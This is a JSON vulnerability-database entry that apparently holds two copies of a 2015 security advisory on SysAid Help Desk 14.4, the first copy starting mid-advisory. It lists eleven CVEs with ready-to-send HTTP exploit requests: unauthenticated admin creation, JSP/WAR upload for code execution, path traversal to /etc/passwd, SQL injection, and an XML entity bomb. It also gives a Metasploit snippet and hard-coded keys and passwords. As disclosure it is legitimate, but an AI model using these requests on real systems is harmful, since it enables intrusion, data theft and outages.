similar to:\n<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\">\n<HTML>\n<HEAD><TITLE>Error</TITLE></HEAD>\n<BODY>\n<H1>Internal Error No#14</H1>\n<H2>/var/lib/tomcat7/webapps/sysaid/./WEB-INF/agentLogs/../../../../../../../../../../bla.war/111.war/1421678611732.zip (Permission denied)</H2>\n</BODY></HTML>\n\nThe tomcat path is revealed between the H2 tags.\n\n\n6)\nVulnerability: Use of hard-coded cryptographic key\nCVE-2015-2998\nConstraints: N/A\nAffected versions: unknown, at least 14.4\n\nSysAid Help Desk uses a hard-coded encryption key and encryption parameters. If this is combined with an arbitrary file download vulnerability (such as #4), a malicious user can then decrypt the database password by downloading the WEB-INF/conf/serverConf.xml file.\nAlgorithm: DES password based encryption with MD5 hash\nKey: \"inigomontoya\"\nSalt: [-87, -101, -56, 50, 86, 53, -29, 3]\nIterations: 19\n\n\n7)\nVulnerability: SQL injection in genericreport, HelpDesk.jsp and RFCGantt.jsp\nCVE-2015-2999\nConstraints: valid administrator account needed\nAffected versions: unknown, at least 14.4\n\na)\nPOST /sysaid/genericreport 
HTTP/1.1\naction=execute&reportName=AssetDetails&scheduleReportParm=null&reportTitle=Asset+Details&company=0&filter=group&groupFilter='&assetID=&assetName=Click+Browse+to+choose&expressionCaption=&customExpression=&customSQL=&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+06%3A27&reRunEvery=2&user1=admin\n\naction=execute&reportName=TopAdministratorsByAverageTimer&scheduleReportParm=null&reportTitle=Administrators+with+the+longest+SRs+time+%28average%29&sr_types=1&company=0&timer=1&expressionCaption=&customExpression=&customSQL=select+*+from+bla&DatePeriod=1&fromDate=26-12-2014&toDate=27-01-2015&NumRecords=5&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+07%3A03&reRunEvery=2&user1=admin&groupingSelection=Administrator&groupingSelectionName=Administrators&subGroupingSelection=AverageTimer&Activity=no\n\naction=execute&reportName=ActiveRequests&scheduleReportParm=null&assetID=&reportTitle=Active+Records&category=000ALL&subcategory=000ALL&thirdLevelCategory=000ALL&sr_types=1&company=0&groupFilter=ALL&expressionCaption=&customExpression=&customSQL='&groupingSelection=Category&DatePeriod=1&fromDate=26-12-2014&toDate=27-01-2015&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+07%3A08&reRunEvery=2&user1=admin\n\nParameters:\ngroupFilter\ncustomSQL\n\n(3 sample payloads are shown - the reportName has to be valid and each reportName expects different parameters)\n\n\nb)\nPOST 
/sysaid/HelpDesk.jsp?helpdeskfrm&fromId=List&ajaxStyleList=YE\nresizeListViewDataArr=AccordionChange&fieldNameChangeState=&tabID=42&actionInfo=&builtFilter=&weightChangeNoAjax=&sort=r.id&dir=asc'&pageNo=1&showAll=0&toggleAll=0&isAccordion=0&calSearch=0&expandAll=0&action=&performAction=&${list.SrTypeFilter}hidden=&${list.category.caption}hidden=&${list.subCategory.caption}hidden=&${list.status.caption}hidden=&${list.requestUser.caption}hidden=&${list.assigned.to.caption}hidden=&${list.priority.caption}hidden=&selection=&selectionDisplay=&saveSelection=1&searchField=Search%20%20%20&dateType=&fromDate=&toDate=&ajaxShown=&multipleSelectionComboboxSet=SetMultipleSelectionCombobox&multipleSelectionComboboxStatus=&multipleSelectionComboboxPriority=&multipleSelectionComboboxAssignedTo=\n\nParameter:\ndir\n\n\nc)\nPOST /sysaid/RFCGantt.jsp HTTP/1.1\nlistName=Service+Requests+All&toInvalid=%27To+date%27+field+contains+an+invalid+value%21&fromInvalid=%27From+date%27+field+contains+an+invalid+value%21&listViewName=DEFAULT&ids=&flag=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&page=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&parentPageName=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&computerID=null&ciId=null&returnToFunction=&srType=&ganttSQL=$select+*+from+ble;$SELECT+r.id,+r.sr_type,+r.account_id,+priority,+escalation,+status,+r.request_user,r.due_date,r.title,r.problem_type,r.problem_sub_type,r.sr_type,r.sr_weight,r.responsibility,r.responsible_manager,r.assigned_group+,+r.id,+r.id,+r.sr_type,+r.problem_type,r.problem_sub_type,r.third_level_category,+r.problem_sub_type,+r.title,+r.status,+r.request_user,+r.responsibility,+r.priority,+r.insert_time+from+service_req+r+++WHERE+r.account_id+%3d+%3f&lookupListName=&scrollPopup=NO&iframeID=null&paneCancelFunc=&filter=+AND+%28archive+%3D+0%29+&fromDate=null&toDate=null&isWeight=true\n\nAccepts injection between $$ in ganttSQL parameter.\n\n\n8)\nVulnerability: Denial of service\nCVE-2015-2996 (same CVE as #4)\nConstraints: no 
authentication or any other information needed \nAffected versions: unknown, at least 14.4\n\nGET /sysaid/calculateRdsFileChecksum?fileName=../../../../../../dev/zero\n\nThis request will cause the cpu to go to 100% and the memory to balloon for 30+ seconds. Sending lots of requests causes the server to slow down to a crawl (although it doesn't seem to crash or hang forever).\n\n\n9)\nVulnerability: XML Entity Expansion (leading to denial of service)\nCVE-2015-3000\nConstraints: no authentication or any other information needed\nAffected versions: unknown, at least 14.4\n\na)\nPOST /sysaid/agententry?deflate=0\n<?xml version=\"1.0\"?>\n<!DOCTYPE lolz [\n <!ENTITY lol \"lol\">\n <!ELEMENT lolz (#PCDATA)>\n <!ENTITY lol1 \"&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;\">\n <!ENTITY lol2 \"&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;\">\n <!ENTITY lol3 \"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;\">\n <!ENTITY lol4 \"&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;\">\n <!ENTITY lol5 \"&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;\">\n <!ENTITY lol6 \"&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;\">\n <!ENTITY lol7 \"&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;\">\n <!ENTITY lol8 \"&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;\">\n <!ENTITY lol9 \"&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;\">\n]>\n<lolz>&lol9;</lolz>\n\nb)\nPOST /sysaid/rdsmonitoringresponse\n<lol bomb in POST data>\n\nc)\nPOST /sysaid/androidactions\n<lol bomb in POST data>\n\nThese requests will cause the cpu to go to 100% and the memory to baloon for 10+ seconds. 
Sending lots of requests causes the server to slow down to a crawl (although it doesn't seem to crash or hang forever).\n\n\n10)\nVulnerability: Uncontrolled file overwrite\nCVE-2015-2993 (same CVE as #1)\nConstraints: no authentication or any other information needed\nAffected versions: unknown, at least 14.4\n\nGET /sysaid/userentry?accountId=1337&rdsName=bla&fileName=../../../service.htm\n\nThis will overwrite the file with \"SysAid\". This string is fixed and cannot be controlled by the attacker.\n\n\n11)\nVulnerability: Use of hard-coded password for the SQL Server Express administrator account\nCVE-2015-3001\nConstraints: N/A\nAffected versions: unknown, at least 14.4\n\nWhen installing SysAid on Windows with the built in SQL Server Express, the installer sets the sa user password to \"Password1\".\n\n\n>> Fix: \nUpgrade to version 15.2 or higher.\n\n================\nAgile Information Security Limited\nhttp://www.agileinfosec.co.uk/\n>> Enabling secure digital business >>", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:59", "description": "\r\n\r\nHi,\r\n\r\ntl;dr Found lots of vulns in SysAid Help Desk 14.4, including RCE.\r\nSysAid have informed me they all have been fixed in 15.2, but no\r\nre-test was performed.\r\n\r\nFull advisory below, and a copy can be obtained at [1].\r\n5 Metasploit modules have been released and currently awaiting merge\r\nin the moderation queue [2].\r\n\r\nRegards,\r\nPedro\r\n\r\n[1]: https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt\r\n[2]:\r\nhttps://github.com/rapid7/metasploit-framework/pull/5470\r\nhttps://github.com/rapid7/metasploit-framework/pull/5471\r\nhttps://github.com/rapid7/metasploit-framework/pull/5472\r\nhttps://github.com/rapid7/metasploit-framework/pull/5473\r\nhttps://github.com/rapid7/metasploit-framework/pull/5474\r\n\r\n>> Multiple vulnerabilities in SysAid Help Desk 14.4\r\n>> Discovered by 
Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\r\n=================================================================================\r\nDisclosure: 03/06/2015 / Last updated: 03/06/2015\r\n\r\n>> Background on the affected product:\r\n"SysAid is an ITSM solution that offers all the essentials, with\r\neverything you need for easy and efficient IT support and effective\r\nhelp desk operations. Its rich set of features includes a powerful\r\nservice desk, asset management and discovery, self-service, and\r\neasy-to-use tools for understanding and optimizing IT performance."\r\n\r\nMetasploit modules that exploit #1, #2, #3, #4, #5 and #6 have been\r\nreleased and should be integrated in the Metasploit framework soon.\r\nAll vulnerabilities affect both the Windows and Linux versions unless\r\notherwise noted.\r\n\r\n\r\n>> Technical details:\r\n1)\r\nVulnerability: Administrator account creation\r\nCVE-2015-2993 (same CVE as #10)\r\nConstraints: none; no authentication or any other information needed\r\nAffected versions: unknown, at least 14.4\r\n\r\nGET /sysaid/createnewaccount?accountID=1337&organizationName=sysaid&userName=mr_lit&password=secret&masterPassword=master123\r\n\r\nThis creates an account with the following credentials: mr_lit:secret\r\nNote that this vulnerability only seems to be exploitable ONCE!\r\nSubsequent attempts to exploit it will fail even if the tomcat server\r\nis restarted.\r\n\r\n\r\n2)\r\nVulnerability: File upload via directory traversal (authenticated;\r\nleading to remote code execution)\r\nCVE-2015-2994\r\nConstraints: valid administrator account needed (see #1 to create a\r\nvalid admin account)\r\nAffected versions: unknown, at least 14.4\r\n\r\n\r\nPOST /sysaid/ChangePhoto.jsp?isUpload=true HTTP/1.1\r\nContent-Type: multipart/form-data;\r\nboundary=---------------------------81351919525780\r\n\r\n-----------------------------81351919525780\r\nContent-Disposition: form-data; name="activation"; 
filename="whatevs.jsp"\r\nContent-Type: application/octet-stream\r\n\r\n<html><body><%out.println(System.getProperty("os.name"));%></body><html>\r\n-----------------------------81351919525780--\r\n\r\n\r\nThe response returns a page which contains the following:\r\n var imageUrl =\r\n"icons/user_photo/14222767515000.1049804910604456_temp.jsp?1422276751501";\r\n var thumbUrl =\r\n"icons/user_photo/14222767515000.1049804910604456_temp_thumb.jsp?1422276751501";\r\n if(imageUrl != null && $.trim(imageUrl).length > 0)\r\n {\r\n document.getElementById("cropbox").src = imageUrl;\r\n document.getElementById("preview").src = thumbUrl;\r\n parent.glSelectedImageUrl =\r\n"icons/user_photo/14222767515000.1049804910604456_temp.jsp";\r\n\r\nGo to http://<server>/sysaid/icons/user_photo/14222767515000.1049804910604456_temp.jsp\r\nto execute the JSP.\r\n\r\n\r\n3)\r\nVulnerability: File upload via directory traversal (unauthenticated;\r\nleading to remote code execution)\r\nCVE-2015-2995\r\nConstraints: no authentication or any other information needed. The\r\nserver has to be running Java 7u25 or lower. This is because Java 7u40\r\n(FINALLY!) rejects NULL bytes in file paths. See\r\nhttp://bugs.java.com/bugdatabase/view_bug.do?bug_id=8014846 for more\r\ndetails.\r\nAffected versions: unknown, at least 14.3 and 14.4\r\n\r\nPOST /sysaid/rdslogs?rdsName=../../../../sample.war%00\r\n<... 
WAR payload here ...>\r\n\r\n\r\n4)\r\nVulnerability: Arbitrary file download\r\nCVE-2015-2996 (same CVE as #8)\r\nConstraints: none; no authentication or any other information needed\r\n(see #5 to obtain the traversal path)\r\nAffected versions: unknown, at least 14.4\r\n\r\nGET /sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd\r\n\r\n\r\n5)\r\nVulnerability: Path disclosure\r\nCVE-2015-2997\r\nConstraints: none; no authentication or any other information needed\r\nAffected versions: unknown, at least 14.4; only works on the Linux version\r\n\r\nPOST /sysaid/getAgentLogFile?accountId=<traversal>&computerId=<junk characters>\r\n\r\nMetasploit PoC:\r\n\r\n large_traversal = '../' * rand(15...30)\r\n servlet_path = 'getAgentLogFile'\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),\r\n 'method' => 'POST',\r\n 'data' =>\r\nZlib::Deflate.deflate(Rex::Text.rand_text_alphanumeric(rand(100) +\r\nrand(300))),\r\n 'ctype' => 'application/octet-stream',\r\n 'vars_get' => {\r\n 'accountId' => large_traversal +\r\nRex::Text.rand_text_alphanumeric(8 + rand(10)),\r\n 'computerId' => Rex::Text.rand_text_alphanumeric(8 + rand(10))\r\n }\r\n })\r\n\r\nThe response (res.body.to_s) will be similar to:\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">\r\n<HTML>\r\n<HEAD><TITLE>Error</TITLE></HEAD>\r\n<BODY>\r\n<H1>Internal Error No#14</H1>\r\n<H2>/var/lib/tomcat7/webapps/sysaid/./WEB-INF/agentLogs/../../../../../../../../../../bla.war/111.war/1421678611732.zip\r\n(Permission denied)</H2>\r\n</BODY></HTML>\r\n\r\nThe tomcat path is revealed between the H2 tags.\r\n\r\n\r\n6)\r\nVulnerability: Use of hard-coded cryptographic key\r\nCVE-2015-2998\r\nConstraints: N/A\r\nAffected versions: unknown, at least 14.4\r\n\r\nSysAid Help Desk uses a hard-coded encryption key and encryption\r\nparameters. 
If this is combined with an arbitrary file download\r\nvulnerability (such as #4), a malicious user can then decrypt the\r\ndatabase password by downloading the WEB-INF/conf/serverConf.xml file.\r\nAlgorithm: DES password based encryption with MD5 hash\r\nKey: "inigomontoya"\r\nSalt: [-87, -101, -56, 50, 86, 53, -29, 3]\r\nIterations: 19\r\n\r\n\r\n7)\r\nVulnerability: SQL injection in genericreport, HelpDesk.jsp and RFCGantt.jsp\r\nCVE-2015-2999\r\nConstraints: valid administrator account needed\r\nAffected versions: unknown, at least 14.4\r\n\r\na)\r\nPOST /sysaid/genericreport HTTP/1.1\r\naction=execute&reportName=AssetDetails&scheduleReportParm=null&reportTitle=Asset+Details&company=0&filter=group&groupFilter='&assetID=&assetName=Click+Browse+to+choose&expressionCaption=&customExpression=&customSQL=&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+06%3A27&reRunEvery=2&user1=admin\r\n\r\nParameters:\r\ngroupFilter\r\n\r\naction=execute&reportName=TopAdministratorsByAverageTimer&scheduleReportParm=null&reportTitle=Administrators+with+the+longest+SRs+time+%28average%29&sr_types=1&company=0&timer=1&expressionCaption=&customExpression=&customSQL=select+*+from+bla&DatePeriod=1&fromDate=26-12-2014&toDate=27-01-2015&NumRecords=5&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+07%3A03&reRunEvery=2&user1=admin&groupingSelection=Administrator&groupingSelectionName=Administrators&subGroupingSelection=AverageTimer&Activity=no\r\n\r\nParameters:\r\ncustomSQL\r\n\r\naction=execute&reportName=ActiveRequests&scheduleReportParm=null&assetID=&reportTitle=Active+Records&category=000ALL&subcategory=000ALL&thirdLevelCategory=000ALL&sr_types=1&company=0&groupFilter=ALL&expressionCaption=&customExpression=&customSQL='&groupingSelection=Category&DatePeriod=1&fromDate=26-12-2014&toDate=27-01-2015&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+07%3A08&reRunEvery=2&user1=admin\r\n\r\nParameters:\r\ncustomSQL\r\n\r\n(3 
different payloads are shown because the reportName parameter seems\r\nto change which parameters have the injection)\r\n\r\n\r\nb)\r\nPOST /sysaid/HelpDesk.jsp?helpdeskfrm&fromId=List&ajaxStyleList=YE\r\nresizeListViewDataArr=AccordionChange&fieldNameChangeState=&tabID=42&actionInfo=&builtFilter=&weightChangeNoAjax=&sort=r.id&dir=asc'&pageNo=1&showAll=0&toggleAll=0&isAccordion=0&calSearch=0&expandAll=0&action=&performAction=&${list.SrTypeFilter}hidden=&${list.category.caption}hidden=&${list.subCategory.caption}hidden=&${list.status.caption}hidden=&${list.requestUser.caption}hidden=&${list.assigned.to.caption}hidden=&${list.priority.caption}hidden=&selection=&selectionDisplay=&saveSelection=1&searchField=Search%20%20%20&dateType=&fromDate=&toDate=&ajaxShown=&multipleSelectionComboboxSet=SetMultipleSelectionCombobox&multipleSelectionComboboxStatus=&multipleSelectionComboboxPriority=&multipleSelectionComboboxAssignedTo=\r\n\r\nParameter:\r\ndir\r\n\r\n\r\nc)\r\nPOST /sysaid/RFCGantt.jsp HTTP/1.1\r\nlistName=Service+Requests+All&toInvalid=%27To+date%27+field+contains+an+invalid+value%21&fromInvalid=%27From+date%27+field+contains+an+invalid+value%21&listViewName=DEFAULT&ids=&flag=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&page=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&parentPageName=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&computerID=null&ciId=null&returnToFunction=&srType=&ganttSQL=$select+*+from+ble;$SELECT+r.id,+r.sr_type,+r.account_id,+priority,+escalation,+status,+r.request_user,r.due_date,r.title,r.problem_type,r.problem_sub_type,r.sr_type,r.sr_weight,r.responsibility,r.responsible_manager,r.assigned_group+,+r.id,+r.id,+r.sr_type,+r.problem_type,r.problem_sub_type,r.third_level_category,+r.problem_sub_type,+r.title,+r.status,+r.request_user,+r.responsibility,+r.priority,+r.insert_time+from+service_req+r+++WHERE+r.account_id+%3d+%3f&lookupListName=&scrollPopup=NO&iframeID=null&paneCancelFunc=&filter=+AND+%28archive+%3D+0%29+&fromDate=null&toDate=null&isWeight=tr
ue\r\n\r\nAccepts injection between $$ in ganttSQL parameter.\r\n\r\n\r\n8)\r\nVulnerability: Denial of service\r\nCVE-2015-2996 (same CVE as #4)\r\nConstraints: no authentication or any other information needed\r\nAffected versions: unknown, at least 14.4\r\n\r\nGET /sysaid/calculateRdsFileChecksum?fileName=../../../../../../dev/zero\r\n\r\nThis request will cause the cpu to go to 100% and the memory to\r\nballoon for 30+ seconds. Sending lots of requests causes the server to\r\nslow down to a crawl (although it doesn't seem to crash or hang\r\nforever).\r\n\r\n\r\n9)\r\nVulnerability: XML Entity Expansion (leading to denial of service)\r\nCVE-2015-3000\r\nConstraints: no authentication or any other information needed\r\nAffected versions: unknown, at least 14.4\r\n\r\na)\r\nPOST /sysaid/agententry?deflate=0\r\n<?xml version="1.0"?>\r\n<!DOCTYPE lolz [\r\n <!ENTITY lol "lol">\r\n <!ELEMENT lolz (#PCDATA)>\r\n <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">\r\n <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">\r\n <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">\r\n <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">\r\n <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">\r\n <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">\r\n <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">\r\n <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">\r\n <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">\r\n]>\r\n<lolz>&lol9;</lolz>\r\n\r\nb)\r\nPOST /sysaid/rdsmonitoringresponse\r\n<lol bomb in POST data>\r\n\r\nc)\r\nPOST /sysaid/androidactions\r\n<lol bomb in POST data>\r\n\r\nThese requests will cause the cpu to go to 100% and the memory to\r\nballoon for 10+ seconds. 
Sending lots of requests causes the server to\r\nslow down to a crawl (although it doesn't seem to crash or hang\r\nforever).\r\n\r\n\r\n10)\r\nVulnerability: Uncontrolled file overwrite\r\nCVE-2015-2993 (same CVE as #1)\r\nConstraints: no authentication or any other information needed\r\nAffected versions: unknown, at least 14.4\r\n\r\nGET /sysaid/userentry?accountId=1337&rdsName=bla&fileName=../../../service.htm\r\n\r\nThis will overwrite the file with "SysAid". This string is fixed and\r\ncannot be controlled by the attacker.\r\n\r\n\r\n11)\r\nVulnerability: Use of hard-coded password for the SQL Server Express\r\nadministrator account\r\nCVE-2015-3001\r\nConstraints: N/A\r\nAffected versions: unknown, at least 14.4\r\n\r\nWhen installing SysAid on Windows with the built in SQL Server\r\nExpress, the installer sets the sa user password to "Password1".\r\n\r\n\r\n>> Fix:\r\nUpgrade to version 15.2 or higher.\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2015-06-08T00:00:00", "title": "[Multiple CVE's]: various critical vulnerabilities in SysAid Help Desk (RCE, file download, DoS, etc)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 7.8, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2996", "CVE-2015-2994", "CVE-2015-3000", "CVE-2015-3001", "CVE-2015-2999", "CVE-2015-2993", "CVE-2015-2997", "CVE-2015-2995", "CVE-2015-2998"], "modified": "2015-06-08T00:00:00", "id": "SECURITYVULNS:DOC:32179", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32179", "cvss": {"score": 8.5, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:COMPLETE/"}}]}